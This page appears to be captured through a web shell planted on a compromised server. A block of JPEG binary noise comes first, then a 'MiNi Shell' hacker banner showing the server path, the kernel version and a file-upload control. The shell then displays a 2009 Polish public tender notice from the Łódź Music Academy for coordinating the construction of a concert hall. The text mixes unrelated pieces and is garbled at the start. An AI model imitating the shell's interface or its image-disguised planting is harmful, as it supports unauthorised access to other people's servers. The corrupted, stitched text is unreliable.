JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091016/362982-N-2009.html

<p class="kh_header"><b>Łódź: Kompleksowe działania koordynacyjne w zakresie realizacji projektu pn. Budowa Sali koncertowej dla celów dydaktycznych Akademii Muzycznej w Łodzi w ramach PO IiŚ, Priorytet XI działanie 11.3</b><br>
<b>Numer ogłoszenia: 362982 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Muzyczna im. Grażyny i Kiejstuta Bacewiczów w Łodzi , ul. Gdańska 32, 90-716 Łódź, woj. łódzkie, tel. 042 6621602, faks 042 6621666.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe działania koordynacyjne w zakresie realizacji projektu pn. Budowa Sali koncertowej dla celów dydaktycznych Akademii Muzycznej w Łodzi w ramach PO IiŚ, Priorytet XI działanie 11.3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowe działania koordynacyjne w zakresie realizacji projektu pn. Budowa Sali koncertowej dla celów dydaktycznych Akademii Muzycznej w Łodzi w ramach PO IiŚ, Priorytet XI działanie 11.3   
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.

Informacje dodatkowe:
W ramach Programu Operacyjnego Infrastruktura i Środowisko na lata 2007-2013 planuje się realizację dużych inwestycji infrastrukturalnych w zakresie ochrony środowiska, transportu, energetyki, kultury i dziedzictwa narodowego, ochrony zdrowia oraz szkolnictwa wyższego.
Projekt Budowa Sali koncertowej dla celów dydaktycznych Akademii Muzycznej w Łodzi realizowany będzie w ramach Priorytetu XI - Kultura i dziedzictwo Kulturowe, Działanie 11.3 -  Infrastruktura Szkolnictwa Artystycznego.

Przedmiotem projektu jest budowa sali koncertowej Akademii Muzycznej im. Grażyny i Kiejstuta Bacewiczów w Łodzi przy ul. Żubardzkiej 2a wraz z zapleczem dla 80 osobowej orkiestry i 80 osobowego chóru, salami do ćwiczeń muzycznych i rytmiki, studiem nagrań, zagospodarowaniem otoczenia nowego obiektu oraz zakupem niezbędnego wyposażenia powstałej infrastruktury. 

W ramach projektu planowane są następujące prace:
- prace budowlane związane z wyburzeniem istniejących obiektów (przygotowaniem terenu pod budowę) i budową obiektu podstawowego (sali koncertowej),
- prace instalacyjne (wewnętrzne i zewnętrzne) dotyczące wentylacji, sieci c.o., wodno- kanalizacyjnej, deszczowej, elektrycznej, ochrony przeciwwłamaniowej i ochrony p.pożarowej,
- wyposażenie obiektu: technologia sceny, gabinety muzykoterapii, windy, fotele na Sali koncertowej, 
- zagospodarowanie otoczenia obiektu (drogi, place, chodniki, zieleń).
Projektowana jest sala dwufunkcyjna: pierwsza funkcja to sala koncertowa (filharmoniczna), druga to sala teatralna (z zapadnią dla orkiestry) z przeznaczeniem dla realizacji i prób spektakli operowych, rytmiki i tańca. Powierzchnia całkowita wybudowanego obiektu wynosić będzie 5 486 m2, a kubatura 34 580 m3..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.	spełniają warunki określone w art. 22 ust.1 i nie podlegają wykluczeniu z postępowania na podstawie art.24 ustawy.
2.	 są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na dzień składania oferty na kwotę min. 100 000 PLN.
3.	wykonali lub wykonują usługi koordynowania w co najmniej jednym projekcie finansowanym ze środków europejskich lub innych funduszy zewnętrznych (np. fundusz Phare, Norweski Mechanizm Finansowy, Mechanizm Finansowy EOG) zrealizowanym przez administrację rządową centralną, administrację rządową terenową, administrację samorządową, podmiot prawa publicznego, organ kontroli państwowej lub ochrony prawa, sąd lub trybunał, uczelnię publiczną, instytucję ubezpieczenia społecznego i zdrowotnego lub samodzielny publiczny zakład opieki zdrowotnej- o wartości projektu co najmniej 10 mln PLN.
4.	dysponują lub będą dysponować osobą która będzie uczestniczyć w wykonywaniu zamówienia, i posiada kwalifikacje niezbędnych do wykonania zamówienia, tj. wykształcenie wyższe w zakresie prawa, administracji lub rachunkowości i finansów oraz ukończyła studia podyplomowe lub szkolenia z zakresu zamówień publicznych i wykonywała lub wykonuje usługi koordynowania  określone w pkt 4.

Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie
oświadczeń lub dokumentów załączonych do oferty na zasadzie : spełnia, nie spełnia. Fakt niespełnienia warunków tzn. brak złożenia oświadczenia o spełnianiu warunków oraz udokumentowania spełniania warunków skutkuje wykluczeniem wykonawcy z udziału w postępowaniu, z zastrzeżeniem art.26 ust.3 i 4 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawcy złożą wraz z ofertą (załącznik nr 2 do SIWZ) niżej wymienione oświadczenia lub dokumenty w oryginale lub kopii poświadczonej za zgodność z oryginałem. Kopie dokumentów muszą być poświadczone za zgodność z oryginałem na każdej zapisanej stronie przez wykonawcę bądź przez upoważnionego przedstawiciela wykonawcy.

W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z 29 stycznia 2004r. - Prawo zamówień publicznych wykonawcy wraz z ofertą przedłożą:

dokument nr 1 - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku wspólnego ubiegania się o udzielenie zamówienia składa je każdy z uczestników;
dokument nr 2 - oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy (załącznik nr 3 do SIWZ). W przypadku oferty wspólnej w/w oświadczenie składają wszyscy uczestnicy;
dokument nr 3 - oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy (załącznik nr 4 do SIWZ). W przypadku oferty wspólnej w/w oświadczenie składają wszyscy uczestnicy.

W celu potwierdzenia, warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia wykonawcy wraz z ofertą przedłożą:

dokument nr 4 - polisa, a w przypadku jej braku inny dokument potwierdzający, że
wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
działalności na dzień składania oferty na kwotę min. 100 000 PLN.
Wykonawca będzie zobowiązany się do przedłużenia ważności polisy lub innego dokumentu do czasu trwania umowy.
W przypadku wspólnego ubiegania się o udzielenie zamówienia składa ją każdy 
z uczestników.

W celu potwierdzenia, opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia wykonawcy wraz z ofertą przedłożą:

dokument nr 5 - wykaz wykonanych lub wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie (zał. 5 do SIWZ); 



W celu potwierdzenia, opisanego przez zamawiającego warunku dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia wykonawcy wraz z ofertą przedłożą:

dokument nr 6 - wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (zał. 6 do SIWZ); 
dokument nr 7 - pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w dokumencie nr 7 wykonawca wskazał osoby, którymi będzie dysponował;
dokument nr 8-  dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień, (np. aktualny wpis na listę członków samorządu zawodowego, aktualne ubezpieczenie od odpowiedzialności cywilnej za szkody wyrządzone przy wykonywaniu czynności).
Warunek ten zamawiający uzna za spełniony jeżeli wykonawca wykaże się, że dysponuje przynajmniej jedną osobą, która spełnia łącznie następujące warunki:
- posiada wykształcenie wyższe w zakresie prawa, administracji lub rachunkowości i finansów (żądany dokument - kopia dyplomu ukończenia studiów);
- ukończyła studia podyplomowe lub szkolenia z zakresu zamówień publicznych
(żądany dokument - kopia dyplomu ukończenia studiów podyplomowych lub zaświadczenia o odbyciu szkolenia);
- koordynowała w co najmniej jednym projekcie finansowanym ze środków europejskich lub innych funduszy zewnętrznych (np. fundusz Phare, Norweski Mechanizm Finansowy, Mechanizm Finansowy EOG) zrealizowanym przez administrację rządową centralną, administrację rządową terenową, administrację samorządową, podmiot prawa publicznego, organ kontroli państwowej lub ochrony prawa, sąd lub trybunał, uczelnię publiczną, instytucję ubezpieczenia społecznego i zdrowotnego lub samodzielny publiczny zakład opieki zdrowotnej- o wartości projektu co najmniej 10 mln PLN ( żądany dokument - wskazanie koordynowanego projektu wraz z dokumentem potwierdzającym należyte wykonanie usługi).

2.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu nr 1 wykonawca winien złożyć dokument lub dokumenty, wystawione w kraju w którym ma siedzibę  lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
c)	zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy.
Dokumenty o których mowa w lit. a, b, c, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.  Wykonawcy przedłożą również wraz z ofertą:
a) pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów złożonych w ofercie;
b) pełnomocnictwa do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.amuz.bip.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Muzyczna im. Grażyny i Kiejstuta Bacewiczów w Łodzi,  
90-716 Łódź,  ul. Gdańska 32 
Godziny urzędowania: od poniedziałku do piątku w godz. od 9:00 do 14:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 12:00, miejsce: Akademia Muzyczna im. Grażyny i Kiejstuta Bacewiczów w Łodzi, 90-716 Łódź,  ul. Gdańska 32  Kancelaria pok. 25.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Infrastruktura i Środowisko Priorytet XI Kultura i dziedzictwo kulturowe Działanie 11.3 Infrastruktura szkolnictwa artystycznego

Creat By MiNi SheLL
Email: jattceo@gmail.com